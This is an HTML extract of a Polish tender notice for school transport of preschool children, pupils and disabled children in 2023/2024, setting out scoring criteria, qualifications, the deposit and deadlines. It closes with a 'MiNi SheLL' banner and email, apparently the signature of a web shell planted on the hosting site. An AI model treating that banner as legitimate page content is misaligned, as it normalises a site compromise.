ofert: <span class="normal">W odniesieniu do Części II zamówienia:<br/><br/>Nazwa kryterium:	<br/>1. Cena brutto za 1 km przewozu, waga kryterium (%) Maksymalna liczba punktów 60% ( 60 pkt )<br/>2. Czas podstawienia pojazdu zastępczego podany w minutach (K2) - z zastrzeżeniem pkt 17.4.3. SWZ, waga kryterium (%) Maksymalna liczba punktów40% ( 40 pkt )<br/><br/>Kryterium „ Cena ” ( C ) - waga 60% :<br/><br/>Kryterium „ Cena” będzie rozpatrywana na podstawie ceny brutto za 1 km przewozu, podany przez Wykonawcę w Formularzu Ofertowym. <br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/><br/>Liczba	zdobytych punktów = Cn/Cb x 100 x 60%<br/> <br/><br/>Gdzie:<br/>Cn – najniższa cena za 1 km przewozu wśród ofert nieodrzuconych <br/>Cb – cena badanej oferty za 1 km przewozu wśród ofert nieodrzuconych <br/>100 – wskaźnik stały<br/>60 % – procentowe znaczenie kryterium ceny<br/><br/>Kryterium „ Czas podstawienia pojazdu zastępczego od chwili wystąpienia awarii pojazdu – K2 ”. <br/><br/>W kryterium „ Czas podstawienia pojazdu zastępczego w razie awarii ”, w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najlepszy wskaźnik ( najkrótszy czas podstawienia pojazdu zastępczego w razie awarii z zastrzeżeniem minimalnego czasu podstawienia pojazdu do 20 minut od telefonicznego powiadomienia Wykonawcy o awarii pojazdu oraz maksymalnego czasu podstawienia pojazdu do 40 minut od telefonicznego powiadomienia Wykonawcy o awarii pojazdu ), zostanie przyznana następująca punktacja:<br/><br/>a) oferowany czas podstawienia pojazdu zastępczego w razie awarii – do 20 minut od telefonicznego powiadomienia Wykonawcy o awarii pojazdu – 100 x waga kryterium (40,00%) – 40,00 punktów;<br/>b) oferowany czas podstawienia pojazdu zastępczego w razie awarii – do 30 minut od telefonicznego powiadomienia Wykonawcy o awarii pojazdu – 50 x waga kryterium (40,00%) – 20,00 punktów;<br/>c) oferowany czas podstawienia pojazdu zastępczego w razie awarii – do 40 minut od telefonicznego powiadomienia Wykonawcy o awarii pojazdu – 0 x waga kryterium (40,00%) – 0,00 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego od chwili wystąpienia awarii pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki <br/> dotyczące :<br/>zdolności do występowania w obrocie gospodarczym:<br/>W odniesieniu do części I i II zamówienia:<br/> Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający stawia szczegółowe wymagania w zakresie spełniania tego warunku.<br/>W odniesieniu do części I i II zamówienia:<br/> Wykonawca spełni warunek, jeżeli wykaże że, posiada aktualną licencję na <br/> wykonywanie transportu drogowego osób, zgodnie z ustawą z dnia 6 września 2001 <br/> roku o transporcie drogowym ( Dz. U. z 2022 r., poz. 2201 ze zm. ). <br/>sytuacji ekonomicznej lub finansowej:<br/>W odniesieniu do części I i II zamówienia:<br/> Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>zdolności technicznej lub zawodowej:<br/>W odniesieniu do części I i II zamówienia:<br/>Zamawiający stawia szczegółowe wymagania w zakresie spełniania tego warunku.<br/>a)	o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie osób, które zostaną skierowane przez Wykonawcę do realizacji zamówienia tj. którzy dysponują lub będą dysponować osobami zdolnymi do wykonywania zamówienia – Wykonawca dla części I winien wykazać, że będzie dysponował min. 2 osobami posiadającymi uprawnienia do kierowania pojazdami oraz 2 osobami pełniącymi funkcję opiekuna, a dla części II min. 1 osobą <br/>posiadającą uprawnienia do kierowania pojazdami oraz 1 osobą pełniącą funkcję opiekuna.<br/>b)	Wykonawca winien wykazać zdolności techniczne, poprzez wykazanie, że dysponuje lub będzie dysponował dla części I co najmniej 2 autobusami przystosowanymi do przewozu dzieci przedszkolnych i uczniów oraz dla części II co najmniej 1 pojazdem przystosowanym do przewozu dzieci niepełnosprawnych aktualnie zarejestrowanych, posiadających ważny przegląd techniczny pojazdów, oraz polisę OC i NNW. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	dokument potwierdzający posiadane uprawnienia do wykonywania krajowego transportu drogowego osób, zgodnie z ustawą z dnia 06.09.2001 r. o transporcie drogowym( Dz. U. z 2022 r., poz. 2201 ze zm. ).<br/><br/> b) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, <br/> w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub <br/> kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji <br/> zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania <br/> zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz <br/> informacją o podstawie do dysponowania tymi osobami. Wykonawca dla części I <br/> winien wykazać, że będzie dysponował min. 2 osobami posiadającymi uprawnienia <br/> do kierowania pojazdami oraz 2 osobami pełniącymi funkcję opiekuna, a dla części II <br/> min. 1 osobą posiadającą uprawnienia do kierowania pojazdami oraz 1 osobą <br/> pełniącą funkcję opiekuna. Wzór stanowi załącznik nr 6 dla części I a dla części II – <br/> załącznik nr 6 A do SWZ. <br/><br/> c) wykaz zdolności technicznych – Wykonawca wykazuje, że posiada dla części I co <br/> najmniej 2 autobusy przystosowane do przewozu dzieci przedszkolnych i uczniów <br/> oraz dla części II co najmniej 1 pojazd przystosowany do przewozu dzieci <br/> niepełnosprawnych. Wzór stanowi załącznik nr 7 dla części I a dla części II – <br/> Załącznik nr 7 A do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty Wykonawca dołącza:<br/><br/>1) Formularz Ofertowy. <br/>2) aktualne na dzień składania ofert oświadczenia o nie podleganiu wykluczeniu oraz <br/> spełnianiu warunków udziału w postępowaniu, o których mowa w pkt 7.1 SWZ,<br/>3) zobowiązanie podmiotu do udostępnienia zasobów, jeżeli wykonawca polega na zasobach <br/> innego podmiotu ( jeżeli dotyczy ),<br/>4) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego <br/> wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy<br/> ( jeżeli dotyczy ),<br/>5) pełnomocnictwo ( jeżeli dotyczy ), <br/>6) uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa, jeżeli wykonawca zastrzegł w ofercie <br/> informacje jako tajemnicę przedsiębiorstwa,<br/>7) dokumenty potwierdzające wniesienie wadium określone pkt 10 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający określa kwotę wadium w wysokości: <br/> - dla części I: 1.500,00 zł ( słownie: tysiąc pięćset złotych 00/100 )<br/> - dla części II: 1.000,00 zł ( słownie: tysiąc złotych 00/100 )<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do <br/> dnia upływu terminu związania ofert.<br/>Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku <br/> następujących formach:<br/>1) pieniądzu;<br/> 2) gwarancjach bankowych;<br/> 3) gwarancjach ubezpieczeniowych;<br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy <br/> z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości <br/> ( t.j. Dz. U. z 2020 r., poz. 299 ).<br/><br/> <br/>Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy <br/> Zamawiającego w:<br/><br/> ESBANK Bank Spółdzielczy w Radomsku. <br/> Nr rachunku: 50 8980 0009 2024 0000 3785 0008 z dopiskiem: <br/> Wadium – „ Dowóz i odwóz dzieci przedszkolnych i uczniów w roku szkolnym <br/> 2023/2024 ” – Część ………… .<br/><br/>Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki <br/> pieniężne wpłyną na konto zamawiającego przed upływem terminu składnia ofert.<br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa <br/> w pkt 10.3. pkt 2–4, wykonawca przekazuje Zamawiającemu oryginał gwarancji lub <br/> poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o zamówienie.<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2)	W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 7.1., składa każdy z wykonawców. Oświadczenia te dołączone do oferty potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4)	W przypadku określenia przez Zamawiającego warunku dotyczącego zdolności do występowania w obrocie gospodarczym lub zdolności technicznej lub zawodowej wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w pkt 6.3 SWZ, z którego wynika, które usługi wykonają poszczególni wykonawcy. Formularz oświadczenia stanowi załącznik nr 5 do SWZ.<br/>5) Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie <br/> zamówienia, Zamawiający będzie żądał przed zawarciem umowy w sprawie <br/> zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>W zakresie rodzajów, okresu ważności i formy, w jakiej mogą być składane oświadczenia <br/> lub dokumenty, o których mowa w pkt 7.4. SWZ obowiązują przepisy Rozporządzenia <br/> Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych <br/> środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać <br/> zamawiający od wykonawcy ( Dz. U z 2020 r. poz. 2415 ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany niniejszej umowy będą wymagały formy pisemnej i zgody obu stron pod rygorem nieważności takich zmian.<br/>Zamawiający na podstawie art 455 ust 1 pkt 1 ustawy PZP przewiduje zmiany umowy.<br/>Rodzaj i zakres zmian został określony szczegółowo w postanowieniach umowy - załącznik nr 8 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez platformę e zamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-02 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com